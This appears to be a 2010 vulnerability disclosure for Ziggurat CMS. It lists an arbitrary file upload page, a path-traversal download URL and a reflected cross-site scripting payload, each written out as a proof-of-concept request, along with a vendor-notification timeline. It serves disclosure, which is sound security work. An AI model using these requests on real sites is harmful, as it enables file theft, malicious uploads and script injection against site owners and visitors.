Ziggurat CMS suffers from arbitrary file upload, arbitrary file download and cross site scripting vulnerabilities.
874c7427aa7a2638495b9b9d17e8d673ba082f4f464b3eac71f80f396b23ddab
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Ziggurat CMS
# Vendor: http://www.farsi-cms.com
#################################################################
Vulnerability:
# Arbitrary File Upload
http://site.com/manager/upload.asp
# Remote File Download
http://site.com/manager/backup.asp?bck=./../file.asp
# Cross Site Scripting
http://site.com/index.asp?id=<script>("xss")</script>
#################################################################
# 2010-04-10 - Vendor notified
# 2010-04-15 - Public disclosure
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################